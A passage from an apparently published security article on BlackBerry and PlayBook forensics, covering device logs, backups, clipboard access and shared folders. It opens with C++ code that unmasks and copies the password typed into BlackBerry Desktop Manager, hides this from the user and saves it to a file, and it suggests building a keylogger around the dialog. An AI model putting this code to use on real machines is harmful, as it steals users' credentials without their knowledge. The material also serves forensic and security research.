//get controls caption for a password-static control GetWindowText(stat_pass, stat_pass_text, 256); //get controls caption for a pin-static control GetWindowText(stat_attmp, stat_attmp_text, 256); //get controls caption for a attemp_count-static control GetWindowText(stat_devc, stat_devc_text, 256); AnsiString DEV_PIN = AnsiString(stat_devc_text); AnsiString ATTEMPT = AnsiString(stat_attmp_text); //correct a program version: //if NULL then BlackBerry Manager v4 or BlackBerry Manager v5 //else everythin s OK - BlackBerry Desktop Manager v6 if (DEV_PIN.Length() < 1) { int pos = AnsiPos("\n", AnsiString(ATTEMPT.c_str())); //extract a first part of Static (PIN) DEV_PIN = ATTEMPT.SubString(1, pos - 1); //extract a second part of Static (attempt count) AnsiString ATTEMPT = ATTEMPT.SubString(pos + 1, ATTEMPT. Length() - pos); } free(stat_devc_text); free(stat_attmp_text); free(stat_pass_text); //get handler of EditBox HWND pass_hwnd = FindWindowEx(window, NULL, "Edit", NULL); //Check desirable EditBox (with Parent Forms Caption "Device Password Requied") If ( ((bool)(int)pass_hwnd) & (pass_hwnd == Wnd) ) { //unset password masking SendMessage(Wnd, EM_SETPASSWORDCHAR, 0, 0); //ReDraw EditBox InvalidateRect(Wnd, 0, true); //allocate memory for edits password char *passw = (char *)malloc(256); //Passwords borrowing

22 / 108
SendMessage(Wnd, WM_GETTEXT, (WPARAM)256, (LPARAM)passw); //store in new variable AnsiString password = AnsiString(passw); free(passw); //Dont let him (user) see it. Paint out. //0x25CF is unicode character of black circle //(dialog boxes on Win7, XP). SendMessageW(Wnd, EM_SETPASSWORDCHAR, 0x25cf, 0); //ReDraw EditBox InvalidateRect(Wnd, 0, true); //If action is unsuccessfull set "EMPTY" info if (DEV_PIN.Length() == 0) { DEV_PIN = "EMPTY"; } if (ATTEMPT.Length() == 0) { ATTEMPT = "EMPTY"; } if (password.Length() == 0) { password = "EMPTY"; } //Store in StringList variable our PIN, attempts count and pass in_list->Add(DEV_PIN); in_list->Add(ATTEMPT); in_list->Add(password); try { in_list->SaveToFile("c:\\pass.txt"); } catch (Exception *ex) { } } } } return 0; }
Grand Success! Look at gures 14-15. We have just caught a bit more extra-protected password.

23 / 108
Figure 1.14: Stolen password (v6) - part I
Figure 1.15: Stolen password (v6) - part II If we manage not with tray application but main BlackBerry Desktop Software (v6-7) then we are not lucky and need to catch another password dialog built in application as well as backup pass dialog. BlackBerry Manager v4 or v5 is based on C++ (and method is the same like previous), but BlackBerry Desktop Manager is based on C# and .NET according to PE analyzers. Thus, it impossible to use WINAPI for stealing. Nevertheless, theres solving. We still can catch a window dialog like Unlocking device and Backup devices data. Look at THREE CONSTANTS OF BLACKBERRY DESKTOP SOFTWARE and gures 16-17
THREE CONSTANTS OF BLACKBERRY DESKTOP SOFTWARE WINDOW TEXT BlackBerry Desktop Software CLASSNAME TEXT HwndWrapper[Rim.Desktop.exe;;4f73dd50-23b3-416c-9ae3-81d8908073f1] WINDOW TEXT Unlock BlackBerry device CLASSNAME TEXT HwndWrapper[Rim.Desktop.exe;;606b4596-b8eb-4102-8d62-5c87d2220001] WINDOW TEXT Back Up Options CLASSNAME TEXT HwndWrapper[Rim.Desktop.exe;;547a3dd4-57aa-4e40-a2ea-16b19fd1697e]

24 / 108
Figure 1.16: BlackBerry Desktop Managers Handlers part I
Figure 1.17: BlackBerry Desktop Managers Handlers part II According to DLL-Catcher and system hooks is possible to make a key-logger that waiting two handler then stealing a password and hibernating watcher mechanism.
Gathering Logs
Previous article on forensics mentioned that BlackBerry Smartphone SDK and BlackBerry Desktop Software have two tools (javaloader, and loader) to provide classic forensic. All PlayBook SDK provided by RIM, e.g. Adobe Air SDK has a tool "blackberry-connect" is just a wrapper for "Connect.jar". But before connect RSA key-pair should be generated by "ssh-keygen -t rsa -b 4096" and "Development Mode" option enabled. Then should be typed target ip (often 169.254.0.1 for USB), device password and ssh key as parameters. This tool extracts device information (like OS, ngerprint, hardware id, vendors id, debug mode tokens, etc.), application list information (like module, version, icon ID, name, vendor, source, etc.) and more. In addition,

25 / 108
Wi-Fi logs stored IP, DNS, subnet mask; information about (un-)successful attempts may be analyzed by manual acquisition only. See section "Device Information", "Application List", and pictures (18-21). Application List
Info: Sending request: List Info: Action: List @applications IMplus.gYABgI3xb8I_.nuWDj1NQXBLFM0::gYABgI3xb8I_-nuWDj1NQXBLFM0,1.4.0.0,contentID::44726, iconID::291534,name::IM+ for BlackBerry PlayBook,sku::IMPlus_for_BlackBerry_PlayBook, vendor::SHAPE,id::559225,releaseType::1,version::1.4,size::1221509,source::appworld WeatherEye10856d5e12aafbeab482ffb6197b1513.gYABgIBVxHVXGt5sqs7ysg11.RY:: gYABgIBVxHVXGt5sqs7ysg11-RY,1.1.0.0,contentID::40883,iconID::266669,name::WeatherEye HD, sku::SKU_WEATHEREYEHD1,vendor::The Weather Network,id::286667,releaseType::1,version ::1.1,size::1411489,source::appworld WeatherMap.gYABgKX7io3amtWzWeXo8.d.kSQ::gYABgKX7io3amtWzWeXo8-d-kSQ,1.2.9.350,contentID ::33880,iconID::225599,name::Weather Map,sku::WeatherMap,vendor::Christian Ruiz,id ::262761,releaseType::1,version::1.2.9,size::1419549,source::appworld com.facebookforplaybook.gYABgGIoTQuGRMYqlV83okVZick::gYABgGIoTQuGRMYqlV83okVZick,2.2.1.7, contentID::43106,iconID::280252,name::Facebook for BlackBerry PlayBook,sku:: FacebookforPlayBook,vendor::Research In Motion Limited,id::477829,releaseType::1,version ::2.2.1.7,size::4382469,source::appworld sys.uri.twitter.gYABgForKB9INNC6dqqT5_aG.wE::gYABgForKB9INNC6dqqT5_aG-wE,2.0.1.15,source:: websl,scmbundle::2.0.1.358 sys.videochat.gYABgHXmq9LYQB023b3XQAWry1k::gYABgHXmq9LYQB023b3XQAWry1k,2.0.1.247,source:: websl,scmbundle::2.0.1.358 sys.videoplayer.gYABgEydozZr9q.ClZkrItC9LMM::gYABgEydozZr9q-ClZkrItC9LMM,2.0.1.234,source:: websl,scmbundle::2.0.1.358 sys.voicerecorder.gYABgCpT2Fra8qyc1S2btWJS_S4::gYABgCpT2Fra8qyc1S2btWJS_S4,2.0.1.233,source ::websl,scmbundle::2.0.1.358 sys.weather.gYABgKOf0EhVEWtCxrbBQ00sPSg::gYABgKOf0EhVEWtCxrbBQ00sPSg,2.0.1.234,source:: websl,scmbundle::2.0.1.358 sys.youtube.gYABgPcyRJTp899l1vKiJZewK88::gYABgPcyRJTp899l1vKiJZewK88,2.0.1.240,source:: websl,scmbundle::2.0.1.358
Device Information
Info: Sending request: List Info: Sending request: List Device Info Info: Action: List Device Info [n]@deviceproperties device_os::BlackBerry PlayBook OS drmhwfp:: 0x62xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx fingerprint:: 3pIxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx hardwareid::0x06xxxxxx radiofingerprint::none scmbundle::2.0.1.xxx scmbundle0::2.0.1.xxx scmbundle1::2.0.1.xxx vendorid::0x1f8 [n]@deviceproperties devicepin::0x50xxxxxx deviceserialnumber::00xxxxxxx13xxx95xxxx [n]@devmode [n]debug_token_author::Yury Chemerkin [n]debug_token_expiration::Sat May 12 00:22:58 GMT+0400 2012 [n]debug_token_installed:b:true [n]debug_token_timeout::10d [n]debug_token_valid:b:true [n]debug_token_validation_error:: [n]debug_token_validation_error_code:n:0 [n]dev_mode_enabled:b:true [n]dev_mode_expiration::10d

26 / 108
[n]dev_mode_waiting:b:true @versions air_version::3.1.0.38 flash_version::11.1.121.38 build_id:: 186xxx production_device:b:true
Figure 1.18: Wi-Fi Status and logs
Figure 1.19: Log options

27 / 108
Figure 1.20: Wi-Fi Info
Figure 1.21: Logs Wi-Fi Logs

******************************** Wi-Fi Diagnostics Logs ********************************

28 / 108
****** DEVICE INFORMATION ****** > Physical Address: e8:xx:xx:xx:xx:xx > Device OS: BlackBerry PlayBook OS > Device Pin: 500xxxxx > OS Version: 2.0.1.668 ****** INTERNET CONNECTION ****** > IP Address: 192.168.1.31 > Subnet Mask: 255.255.255.0 > Default Gateway: 192.168.1.1 > Primary DNS: 192.168.1.1 > Secondary DNS: > Domain Suffix: > MTU: 1500 > Proxy Server: > Proxy Port: ****** WI-FI INFORMATION ****** > Status: Connected > Failure Reason: > Profile Name: XXXX > SSID: XXXX > Channel: 11 > AP MAC Address: 48:xx:xx:xx:xx:xx > Security Type: WPA2 Personal > EAP Method: > Signal Level: -41 dBm > Connection Data Rate: 65 Mbps > Network Type: 802.11g/n
******************************** Supplicant Logs ******************************** > 21:27:40: 1v CTRL-EVENT-CONNECTED - Connection to 48:xx:xx:xx:xx:xx completed (reauth) [ id=0 id_str=] > 21:27:40: 2v WPA: Key negotiation completed with 48:xx:xx:xx:xx:xx [PTK=CCMP GTK=CCMP] > 21:27:39: 3v Associated with 48:xx:xx:xx:xx:xx > 21:27:39: 4v Trying to associate with 48:xx: xx:1 xx 3:c9:4d (SSID=XXX freq=2462 MHz) > 21:27:19: 5v CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys > 00:10:34: 6v CTRL-EVENT-CONNECTED - Connection to 48:xx:xx:xx:xx:xx completed (reauth) [ id=0 id_str=] WPA: Key negotiation completed with 48:xx:xx:xx:xx:xx [PTK=CCMP GTK=CCMP] > 00:10:34: 7v > 00:10:34: 8v Associated with 48:xx:xx:xx:xx:xx > 20:41:30: 9v CTRL-EVENT-CONNECTED - Connection to 48:xx:xx:xx:xx:xx completed (reauth) [ id=0 id_str=] v > 20:41:30: 10 WPA: Key negotiation completed with 48:xx:xx:xx:xx:xx [PTK=CCMP GTK=CCMP] 11 Associated with 48:xx:xx:xx:xx:xx > 20:41:30: v v > 20:41:30: 12 Trying to associate with 48:xx:xx:xx:xx:xx (SSID=XXXX freq=2462 MHz) v > 20:26:03: 13 CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys v > 17:49:29: 14 CTRL-EVENT-CONNECTED - Connection to 48:xx:xx:xx:xx:xx completed (auth) [id =0 id_str=]

29 / 108
Backup Data
Managing with backup starts with BlackBerry Desktop Manager that results ".IPD" (early, now it is ".BBB" le is just compress with tar) in a destination folder. This le stores: on BlackBerry smartphone very granulated data (incl. Options) like Address Book, Alarm, Attachment, AutoText, BlackBerry Bridge, BlackBerry Wallet, Bluetooth, Browser, Calendar, Camera, Certicate, etc. on BlackBerry tablet only Application Data, Media and Settings. As PlayBook does not provide native Password Wallet, many third party applications often save data in shared\documents folder in ".db" format easy analyzed if no encryption.
BlackBerry Simulation
The BlackBerry Smartphone Simulator built for simulating a backup copy of the physical device. This is helpful if the device is low on battery, should be placed to the "turn off" state, or you do not want to alter the data on the physical device. Following steps are suitable for each BlackBerry device model. Nevertheless, there is no similar solution for the PlayBook as well as for Android, despite of that is very useful and valuable.
Live (Spy) forensic

There some situations that is not desirable to shut down, seize the digital device, and perform the forensic analysis at the lab. For example, if there is an indication that an encryption mechanism used on the digital device that was discovered, then the investigator should not shutdown this digital device. Otherwise, after shutdown all encrypted information (potential evidence) will be unintelligible. By performing Live Analysis, the investigators attempt to extract the encryption key from the running system. An up-to-date BlackBerry has many data, such as several mobile or home phone number, faxes, emails, work and home addresses, web-pages or dates; IM data and social data, private data such as tracking info, habits, time marked a free, time when users possible sleeping, time when users at home/company can come to light and many else. However, all those can be extracted only with API or Backup le. Clipboard is breakable too because user have to see a password to retype in another application that can easily be screen-captured or to copy into clipboard that not protected, because user still have to put data (password) into non-protected text-box, sometimes in plaintext even. In other words, end-point object is vulnerable. As Clipboard API exists like getClipboard() on BlackBerry, getData() on PlayBook, or getText() on Android (see the Listing 7). Listing 7. Clipboard events for PlayBook
package { import import import import import import import flash.desktop.Clipboard; flash.desktop.ClipboardFormats; flash.desktop.ClipboardTransferMode; flash.display.Sprite; flash.display.StageAlign; flash.display.StageScaleMode; flash.text.TextField;
import qnx.events.ClipboardEvent; import qnx.events.QNXSystemEvent; public class Clipboard1 extends Sprite { public function Clipboard1() { super();

30 / 108
stage.align = StageAlign.TOP_LEFT; stage.scaleMode = StageScaleMode.NO_SCALE; var tf:TextField = new TextField(); tf.height = 600; tf.width = 1024; tf.text = "result = \n" + paste(); this.addChild(tf); } private function write():String { return ClipboardEvent.CLIPBOARD_WRITE; } private function read():String { return ClipboardEvent.CLIPBOARD_READ; } private function copy(text:String):void { Clipboard.generalClipboard.clear(); Clipboard.generalClipboard.setData(ClipboardFormats.TEXT_FORMAT, text); } private function paste():String { if(Clipboard.generalClipboard.hasFormat(ClipboardFormats. TEXT_FORMAT)) { return String(Clipboard.generalClipboard.getData( ClipboardFormats.TEXT_FORMAT)); } else { return null; } } } }
Figure 1.22: Clipboard Formats To access to the Pictures, Videos, Voice notes, and other les, some of them may be video captured or audio captured, forensics expert rarely need to intercept API events or break root rights; all needs is listen le events of creating and deleting les or grab

31 / 108
these les from internal/external storage. Pictures are more inquisitive as camera-snapshots since it has EXIF-header. Metadata is, quite simply, data about data. Many digital camera manufacturers, such as Canon, Sony and Kodak implement EXIF headers. This header is stored in an "application segment" of a JPEG le, or as privately dened tags in a TIFF le. Not only basic cameras have these headers, but also both mobile devices provide the "Camera Make" as RIM/BlackBerry/Android/HTC data as well as "Camera Model" may often be device model. GPS or date tag often renames lename by placing into beginning city name except Android and PlayBook. They place GPS and date tag in EXIF only. Just remind: photos named IMG20120103xxxx. To talk about geo-tag per le then I will get a "Moskva" prex in le name. Of course, it is not enough when city names named in the same manner like US states, however, it may differ because I cannot test it. Anyway, it is obvious why developers store name of le as city part, Date part and increment part. Some examples for the PlayBook: camera - Research In Motion, model BlackBerry Playbook, exposure 1/xxx s, diaphragm opening 2.97, ash no, EXIF version 0230. Audio notes, photos, videos, music, and cameras data stored in one place (more correctly in two places, on internal storage and external storage like SD-card if an external exists). Any programmers are allowed to listen these folder path to extract your data in realtime; moreover they may have exactly API to access to the same folders. They may associate their listeners with specied le format like AMR (BlackBerry Smartphone) or m4a (BlackBerry Tablet) that used to store your BlackBerry voice notes. They often store in "voice notes" folder, named as VN-20120319-xxxx.AMR or VN-20120319-xxxx.m4a. "20120319" is date with YYYY-MM-DD formatting. As you can see, you do not need to extract properties to know when it recorded; you do not even need to link (programmatically) folder with type le (logical level) because "VN" is voice note. Recorded video les named "VID-YYYYMMDD-XXXXXX.3GP" as voice note or picture le for BlackBerry Smartphone and VID- XXXXXX.MP4 for tablet. Each application has access to its own working directory in the le system on the PlayBook, and might access to the shared folder (sandbox) because of the access to the les and folders governed by UNIX-style groups and permissions. It means applications cannot create new directories in the working directory; they can only access the folders listed in Table 1. Table 1.1: Table 1. Playbook Shared folders structure Folder app data temp logs shared shared/bookmarks shared/books shared/clipboard shared/documents shared/downloads shared/misc shared/music shared/photos shared/videos shared/voice What data contains The installed applications les. The applications private data. The applications temporary working les. System logs for an application (stderr and stdout) Subfolders that contain shared data grouped by type. Web browser bookmarks that can be shared among applications. eBook les that can be shared among applications. Data copied or cut from another application (txt, html, uri format). Documents that can be shared among applications. Web browser downloads. Miscellaneous data that can be shared among applications. Music les that can be shared among applications. Photos that can be shared among applications. Videos that can be shared among applications. Audio recordings that can be shared among applications. Access type read-only read and write access read and write access read and write access no access read and write access read and write access read and write access read and write access read and write access read and write access read and write access read and write access read and write access read and write access

32 / 108
Table 1.2: Table 2. Extractable Data Type Address Book Calendar Events Call History Browser history and bookmarks Process Management Memos and Tasks Screen-shots Camera-shots Videocamera-shots Clipboard Location tracking (cell, wi, gps, bluetooth) SMS/MMS/Emails/IM Saved Messages Pictures, Videos, Voice notes, and other les File and Folder structure IMs Passwords Clipboard BlackBerry OS BlackBerry Smarpthone + + + + + + + + + + + + + + + + + + BlackBerry Playbook + + + + + + + + + +
Conclusion
Mobile devices are everywhere, and contain more evidence about their users than perhaps any other source. The technology is constantly changing, making forensics a challenge. Handled properly, however, a forensic examination of a mobile device can yield evidence that cannot be found anywhere else, including communications and geographic location data that can change the course of an entire case or investigation. The BlackBerry devices as well as Android devices share the same evidentiary value as any other Personal Digital Assistant (mobile device). As the investigator may suspect of most le systems, a delete is by no means a total removal of data on the device. However, the BlackBerry smartphone is always-on, wireless push technology adds a unique dimension to forensic examination. Android and Playbook instead tends to be more ofine and wake up by user actions. All mentioned above highlights value and up-to-date techniques on forensics area, some of them based on issues misunderstanding development concepts or else. Similar to the BlackBerry, Push-technology allows information be pushed through its radio antenna at any time, potentially overwriting previously "deleted" data. Classic Forensics techniques or DLP system is ineffective to stop it because of time, applications that exchanged data in real-time. In addition, the password has a long-term problem. Some techniques very impactful but limited special cases. Its obvious Android should be rooted, BlackBerry smartphone should have a backup or correspond to the forensics methods and tools, while Playbook limits with shared folder only and theres no way to root it or mirror all data to the PlayBook simulator as it was for BlackBerry smartphone. The les store on external or internal storage might be useful to obtain some data stored in backup or available to API. It means forensics needs more practical and preventive techniques to extract data. Simply using developers API helps to grab data like password for social networks or mail inbox in blackberry smartphone cases that do not stored anywhere. In addition, IM chats do not store else external/internal storage and can only be accessible in way data extracting but if password is known and storage does not encrypted. It means live techniques through API make sense only. Moreover, there is technique preventing successful USB or Bluetooth connection as a live-agent performing DDoS to the event-listener. Finally, all security holes or vendor vision about security on their OS are very astounding to use, it reduces the risks for loss of valuable data and improve existing solutions. In addition, forensics expert protected from almost all objectives capable break and stop forensics investigation.

33 / 108
On the Net To Get Round to the Heart of Fortress. Hakin9 Extra. Yury Chemerkin: http://hakin9.org/to-get-round-to-the-heart-of-fortress/ Why is password protection a fallacy a point of view, Hakin9 Extra, Yury Chemerkin: http://hakin9.org/hakin9-extra-12011exploiting-software/ The Philosophy of QNX Neutrino: https://developer.blackberry.com/native/documentation The QNX Neutrino Microkernel: https://developer.blackberry.com/native/documentation Dynamic Linking: https://developer.blackberry.com/native/documentation Process Manager: https://developer.blackberry.com/native/documentation What is BlackBerry Tablet OS?: https://developer.blackberry.com/native/documentation Managing your application through the application life cycle: https://developer.blackberry.com/native/documentation Accessing restricted functionality: https://developer.blackberry.com/native/documentation Folders accessible by an application: https://developer.blackberry.com/native/documentation Filesystems: https://developer.blackberry.com/native/documentation Networking Architecture: https://developer.blackberry.com/native/documentation TCP/IP Networking: https://developer.blackberry.com/native/documentation A Playbook for Real-Time, Closed-Loop Control, Harry Funk, Robert Goldman, Christopher Miller, John Meisner, Peggy Wu, Smart Information Flow Technologies, LLC: http://www.dtic.mil/cgi-bin/GetTRDoc?AD=ADA439281 When Developers API Simplify User-Mode Rootkits Developing, Hakin9 Mobile Magazine: http://hakin9.org/hakin9-mobile22012-2 When Developers API Simplify User-Mode Rootkits Development - Part II, Hakin9 OnDemand Magazine: http://hakin9.org/hakin9-ondemand-network-security-4124 "Insecurity of blackberry solutions: Vulnerability on the edge of the technologies," vol. 6, pp. 20-21, December 2011 [Annual InfoSecurity Russia Conf., 2011] D. M. Gomez, A. Davis, BlackBerry PlayBook Security: Part one. NGS Secure, 2011.: http://www.nccgroup.com/secure/hVq8hE-N4Wc%3d/1099 BlackBerry PlayBook Security - Part Two - BlackBerry Bridge, G. Jones, NGS Secure, 2011: http://www.nccgroup.com/secure/V20GFyDJrD0%3d/1099 Mobile Device Forensics: A Brave New World? Contributed by Jason Gonzalez and James Hung, Stroz Friedberg LLC: http://www.strozfriedberg.com/les/Publication/ Challenges in Mobile Phone Forensics, Kyle D. Lutes, Richard P. Mislan: http://www.iiis.org/cds2008/cd2008sci/citsa2008/paperspdf/i649ok.pdf Mobile Forensics: an Overview, Tools, Future trends and Challenges from Law Enforcement perspective, Rizwan Ahmed, Rajiv V. Dharaskar: http://www.iceg.net/2008/books/2/34_312-323.pdf

34 / 108
About the author
Yury Chemerkin Graduated at Russian State University for the Humanities (http://rggu.com/) in 2010. At present postgraduate at RSUH. Information Security Researcher since 2009 and currently works as mobile and social information security researcher in Moscow. Experienced in Reverse Engineering, Software Programming, Cyber & Mobile Security Researching, Documentation, and Security Writing as regular contributing. Now researching Cloud Security and Social Privacy. Contacts I have many social contacts to help you choose the most suitable way for you. Regular blog: http://security-through-obscurity.blogspot.com Regular Email: yury.chemerkin@gmail.com Skype: yury.chemerkin Other my contacts (blogs, IM, social networks) you will nd among http links and social icons before TimeLine section on Re.Vu: http://re.vu/yury.chemerkin

BlackBerry Playbook - New Challenges

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

BlackBerry Playbook - New Challenges

Uploaded by

Copyright:

Available Formats

Dont Be Mocked Secure Your System